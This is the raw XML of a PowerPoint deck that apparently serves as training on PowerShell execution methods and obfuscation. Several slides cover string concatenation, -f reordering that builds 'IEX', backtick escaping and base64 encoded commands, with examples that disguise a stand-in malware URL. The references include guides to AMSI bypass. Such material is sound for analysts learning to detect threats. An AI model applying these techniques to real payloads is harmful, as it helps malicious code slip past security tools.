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83" r:id="rId17"/>
    <p:sldId id="284" r:id="rId18"/>
    <p:sldId id="285" r:id="rId19"/>
    <p:sldId id="286" r:id="rId20"/>
    <p:sldId id="287" r:id="rId21"/>
    <p:sldId id="282" r:id="rId22"/>
    <p:sldId id="281" r:id="rId23"/>
    <p:sldId id="274" r:id="rId24"/>
    <p:sldId id="272" r:id="rId25"/>
    <p:sldId id="273" r:id="rId26"/>
    <p:sldId id="276" r:id="rId27"/>
    <p:sldId id="277" r:id="rId28"/>
    <p:sldId id="279" r:id="rId29"/>
    <p:sldId id="280" r:id="rId3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7A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1D766-CBE7-41F8-B712-44B91E292202}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/1/28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98934-02AF-4A81-B630-134AE0BF806C}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2856193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7B11F138-C587-4D3B-BD6B-C43E944AA108}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/1/28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7515765-4925-4C39-843B-55AAF0368D7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55C3C375-37B1-4408-8FC4-966ADCFF8D14}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/1/28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7515765-4925-4C39-843B-55AAF0368D7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3387A44-E956-4F87-8B93-06FFAE005F98}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/1/28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7515765-4925-4C39-843B-55AAF0368D7C}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>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C16B70A5-A42F-4370-801D-CBA9A5BCDAED}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/1/28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7515765-4925-4C39-843B-55AAF0368D7C}"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C7DFC4F8-790E-4691-8F7D-CA8ED72E767B}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/1/28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7515765-4925-4C39-843B-55AAF0368D7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9FDDAFEC-006B-4C6C-9FB5-A9E8263EF404}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/1/28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7515765-4925-4C39-843B-55AAF0368D7C}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>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3DD9F372-40F7-4D0F-AF3D-90E4FFF6871A}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/1/28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7515765-4925-4C39-843B-55AAF0368D7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1F93CB76-D29C-4679-8C49-B3E9E468361B}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/1/28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7515765-4925-4C39-843B-55AAF0368D7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279AB02-7C1E-4D2E-B346-69DEE93F2344}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/1/28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37515765-4925-4C39-843B-55AAF0368D7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AFD966-E605-4C7C-92A3-6789C4392647}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/1/28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7515765-4925-4C39-843B-55AAF0368D7C}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>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3F92399-B5F7-41B5-B741-BA45DC1182D3}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/1/28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7515765-4925-4C39-843B-55AAF0368D7C}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>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EDDC180-B482-4806-9CFA-94945B5EB028}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/1/28</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515765-4925-4C39-843B-55AAF0368D7C}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>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learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.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ynet.com/attack-techniques-hands-on/powershell-obfuscation-demystified-series-chapter-1-intr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ynet.com/attack-techniques-hands-on/powershell-obfuscation-demystified-series-chapter-1-intr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zh.wikipedia.org/zh-tw/Base6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ackingarticles.in/a-detailed-guide-on-amsi-bypass/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentestlaboratories.com/2021/05/17/amsi-bypass-method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entestlaboratories.com/2021/05/17/amsi-bypass-method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hackingarticles.in/a-detailed-guide-on-amsi-bypas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learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_environment_provider?view=powershell-7.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learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_environment_provider?view=powershell-7.3"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learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_environment_provider?view=powershell-7.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learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_environment_provider?view=powershell-7.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az4n6.blogspot.com/2018/06/malicious-powershell-in-registry.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az4n6.blogspot.com/2018/06/malicious-powershell-in-registry.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az4n6.blogspot.com/2018/06/malicious-powershell-in-registr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ynet.com/attack-techniques-hands-on/powershell-obfuscation-demystified-series-chapter-1-intr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ynet.com/attack-techniques-hands-on/powershell-obfuscation-demystified-series-chapter-1-intr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ynet.com/attack-techniques-hands-on/powershell-obfuscation-demystified-series-chapter-1-intr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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Invoke-Expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="副標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"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1</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2675705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564904"/>
            <a:ext cx="8424936" cy="3744416"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> can be executed in either one of the following ways:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>Registry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>This technique was extensively used by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Poweliks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>kovter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> malware variants ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mshta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>rundll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ActiveXObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>File:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>.ps1 / .VBS / .BAT and scheduled task.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>Macros:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Office files- Word, Excel, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>Remotely:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>PowerShell Remoting (PSS), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>PsExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, WMI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>PowerShell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Execution Options        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Max </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Malyutin</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10</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3351463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b="1" dirty="0" smtClean="0"/>
              <a:t>Concatenation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>Reordering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>Escaping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>character</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>Base64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>Up\Low </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>case</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>white spaces</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Most Common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>PowerShell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Obfuscation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Techniques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Max </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Malyutin</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11</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4091760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7"/>
            <a:ext cx="8020413" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Split </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>strings into multiple parts which are concatenated through the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>” operator </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>example.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$a = “http://malware.com/cybad.exe”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$b = (‘h’+’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ttp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ma’+’lware.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/cybad.exe’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Concatenation</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>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12</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3551838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Formatting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>operator (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>), the string is divided in several parts and will reorder by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“{1}{0}” -f ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>x’,’IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US"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13</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Reordering</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2916907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675467"/>
            <a:ext cx="8496944" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Escape </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>character (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) will try to trick the analyst to understand the command, they are typically inserted into the middle of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://malware.com/cybad.exe </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="147A42"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a = (“http://mal`ware.c`om.cy`bad.ex`e”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US"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14</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Escaping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Character</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2242204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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>EncodedCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) accepts a base-64 encoded string .</a:t>
